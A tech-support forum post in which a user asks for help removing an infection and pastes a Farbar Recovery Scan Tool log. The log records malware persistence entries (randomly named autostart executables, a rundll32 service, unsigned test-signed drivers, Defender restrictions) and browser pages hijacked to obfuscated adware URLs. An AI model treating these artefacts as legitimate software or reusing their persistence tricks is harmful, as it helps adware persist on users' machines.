February 8th, 2019, 01:14 PM
[RESOLVED] IE keeps popping and fake folders on drive C:\
Hello masters!
I ran a free Total AV quick and full scan and it resolved at least 30 threats. But upon restart, there are fake folders popping up on C:\ and IE keeps popping up like crazy. Please help me clean my laptop. Here are the logs:
FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 6.02.2019
Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (09-02-2019 00:59:59)
Running from C:\Users\Thomazing!\Downloads
Loaded Profiles: Thomazing! (Available Profiles: Thomazing!)
Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() C:\ProgramData\Logic Cramble\set.exe
(Google Inc.) C:\ProgramData\localNETService\localNETService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(J4K6ZYTM) C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
() C:\Program Files (x86)\Multitimer\Multitimer.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(J4K6ZYTM) C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe
( ) C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe
() C:\Users\Thomazing!\AppData\Local\Temp\is-UBPC7.tmp\i2z4dmklduc.tmp
(TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM-x32\...\Run: [Multitimer] => C:\Program Files (x86)\Multitimer\Multitimer.exe [281600 2017-12-12] () <==== ATTENTION
HKLM-x32\...\Run: [DiskPower] => "C:\Program Files (x86)\DiskWMpower\DiskPower.exe"
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1708016 2019-02-06] (Google LLC -> Google Inc.)
HKLM\...\RunOnce: [OMEWPRODUCT_7FCEM] => C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe [236032 2019-02-08] (J4K6ZYTM) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8222286] => "C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr\iastcgr31fm.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [WK27HXJEIFMX6EE] => "C:\Program Files\200OTU5ILR\200OTU5IL.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8735117] => "C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm\ncu5cze5p50.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [T9KTUNJFV82076N] => "C:\Program Files\1TH7OLWWNG\1TH7OLWWN.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CloudNet] => C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-08] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9428290] => "C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy\ubd1dkxuekl.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [U943W0QT19CB97H] => "C:\Program Files\J7CMVSXGZX\J7CMVSXGZ.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [3525589] => "C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4\bqedsdhpytd.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [URD8WCW2ZCRHWKK] => "C:\Program Files\RQIX2K7UEC\RQIX2K7UE.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [NNHJYS7S607ZBCR] => "C:\Program Files\0JJM5TTRFB\IBKXK5Q0P.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [9236653] => "C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce\zrxkioireze.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [8581968] => "C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2\lihriqawtkv.exe" /VERYSILENT
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [44K3AH7DLU628F4] => "C:\Program Files\E1WSWX87LG\BIX8CZGTD.exe"
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [H82B1SB6W40C6YU] => C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe [850944 2019-02-09] (J4K6ZYTM)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [5608956] => C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt\i2z4dmklduc.exe [1277549 2019-02-09] ( )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.43.1
Internet Explorer:
==================
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-bFEwE5S0xnXgWxUsARdsrsiNM_BcRR6VIUgHwYSXwHh7Ffv8ygm0uKm7dXNxCM7Ay7BGUULgFL93oS9c_xJL13HFJx
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3408261874-2140888000-2142219774-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUX9LRVRJoPYFrhxxtaF-91kMr4aYnBF3AiUwkWeX9Lcvroqw4fFHdSyaWqi-bTeQpOgq8GmhyugFA-oCfgyL8lTV3FXzedUhRdT0Tk-a20qstFrzGkWt88Enx1zCRT8c4ZVOM3Ou-CJLbMqrt96pQNSQhDy8Im_06irGC1H_&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
FireFox:
========
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
Chrome:
=======
CHR DefaultSearchURL: Default -> hxxps://feed.bazzsearch.com/?fext=true&publisherid=51206&publisher=defaultbazz&st=ed&q={searchTerms}
CHR DefaultSearchKeyword: Default -> Bazz Search
CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-09]
CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
CHR Extension: (Flower Power) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
CHR Extension: (Bazz Search) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
CHR Extension: (Gmail) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-08]
CHR Extension: (Chrome Media Router) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-06-10]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2019-02-07] () [File not signed] <==== ATTENTION
R2 localNETService; C:\ProgramData\localNETService\localNETService.exe [1905784 2019-02-08] (CONVERSION MAGIC LTD -> Google Inc.)
R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [4429264 2018-12-06] (Protected Antivirus Limited -> TotalAV)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== ATTENTION (zero byte File/Folder)
R2 NWQxNTAzNz; rundll32.exe C:\Windows\bxetfbicyncsflqei.bxetf IQQV [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 B62CD2D3FFB1; C:\Windows\B62CD2D3FFB1.sys [621928 2019-02-08] (韵羽健康管理咨询(上海)有限公司 -> VxDriver)
S3 bcmfn2; C:\Windows\System32\drivers\bcmfn2.sys [17624 2015-06-18] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
R3 FwLnk; C:\Windows\System32\drivers\FwLnk.sys [17920 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> TOSHIBA Corporation)
S3 iaLPSSi_GPIO; C:\Windows\System32\drivers\iaLPSSi_GPIO.sys [38128 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
S3 iaLPSSi_I2C; C:\Windows\System32\drivers\iaLPSSi_I2C.sys [122608 2015-06-18] (Intel Corporation - Client Components Group -> Intel Corporation)
R3 igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [10627744 2019-02-08] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
S0 nvraid; C:\Windows\System32\drivers\nvraid.sys [150368 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
S0 nvstor; C:\Windows\System32\drivers\nvstor.sys [166240 2015-07-10] (Microsoft Windows -> NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-18] (Microsoft Windows -> Realtek )
R3 RTL8187B; C:\Windows\System32\drivers\rtl8187B.sys [459336 2015-06-18] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation )
S0 SiSRaid2; C:\Windows\System32\drivers\SiSRaid2.sys [44896 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems Corp.)
S0 SiSRaid4; C:\Windows\System32\drivers\sisraid4.sys [81760 2015-07-10] (Microsoft Windows -> Silicon Integrated Systems)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45720 2019-02-08] (TOSHIBA CORPORATION -> Toshiba Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2019-02-08] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-02-08] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-02-09 13:22 - 2019-02-09 00:52 - 000875126 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-09 13:21 - 2019-02-09 13:21 - 000002353 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-02-09 13:21 - 2019-02-09 13:21 - 000000000 ___RD C:\Users\Thomazing!\OneDrive
2019-02-09 13:20 - 2019-02-09 13:20 - 000000000 ____D C:\Windows\CSC
2019-02-09 13:19 - 2019-02-09 13:19 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_defaultuser0_HistoryPrediction.bin
2019-02-09 13:19 - 2019-02-09 13:19 - 000000020 ___SH C:\Users\Thomazing!\ntuser.ini
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Adobe
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\VirtualStore
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TileDataLayer
2019-02-09 13:19 - 2019-02-09 13:19 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Publishers
2019-02-09 13:19 - 2019-02-08 22:22 - 000000000 ____D C:\Users\Thomazing!
2019-02-09 13:19 - 2019-02-08 21:38 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Packages
2019-02-09 13:15 - 2019-02-09 13:15 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2019-02-09 13:14 - 2019-02-08 23:05 - 000000000 ____D C:\Windows\Panther
2019-02-09 00:59 - 2019-02-09 01:01 - 000020986 _____ C:\Users\Thomazing!\Downloads\FRST.txt
2019-02-09 00:59 - 2019-02-09 00:59 - 000000000 ____D C:\FRST
2019-02-09 00:58 - 2019-02-09 00:59 - 002433536 _____ (Farbar) C:\Users\Thomazing!\Downloads\FRST64.exe
2019-02-09 00:43 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files\OTIZAMD5IS
2019-02-09 00:43 - 2019-02-09 00:43 - 000016148 _____ C:\Windows\system32\DESKTOP-OHFLJFD_Thomazing!_HistoryPrediction.bin
2019-02-09 00:43 - 2019-02-09 00:43 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\mo24n4005vt
2019-02-09 00:30 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\wlzey0ugdb2
2019-02-08 23:57 - 2019-02-08 23:57 - 000000000 ____D C:\ProgramData\TechSmith
2019-02-08 23:56 - 2019-02-08 23:58 - 000000000 ____D C:\Users\Thomazing!\Documents\Snagit
2019-02-08 23:56 - 2019-02-08 23:56 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\TechSmith
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Snagit12
2019-02-08 23:55 - 2019-02-08 23:55 - 000000000 ____D C:\Program Files (x86)\Snagit12
2019-02-08 23:11 - 2019-02-08 23:11 - 000000000 ____D C:\Users\Thomazing!\Documents\TotalAV
2019-02-08 23:10 - 2019-02-08 23:10 - 000000000 ____D C:\ProgramData\SecuritySuite
2019-02-08 23:09 - 2019-02-09 00:44 - 000000000 ____D C:\Program Files (x86)\TotalAV
2019-02-08 23:09 - 2019-02-08 23:09 - 000001089 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TotalAV.lnk
2019-02-08 23:09 - 2019-02-08 23:09 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\TotalAV
2019-02-08 23:02 - 2019-02-09 00:30 - 000000000 ____D C:\Program Files\CCleaner
2019-02-08 23:02 - 2019-02-08 23:02 - 000003936 _____ C:\Windows\System32\Tasks\CCleaner Update
2019-02-08 23:02 - 2019-02-08 23:02 - 000002898 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2019-02-08 23:02 - 2019-02-08 23:02 - 000002377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-08 23:02 - 2019-02-08 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2019-02-08 23:01 - 2019-02-08 23:01 - 000000000 ____D C:\Program Files\Google
2019-02-08 23:00 - 2019-02-08 23:07 - 000003418 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2019-02-08 23:00 - 2019-02-08 23:07 - 000003294 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2019-02-08 23:00 - 2019-02-08 23:01 - 000000000 ____D C:\ProgramData\Google
2019-02-08 22:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\b2mkkcpioce
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files\MSBuild
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
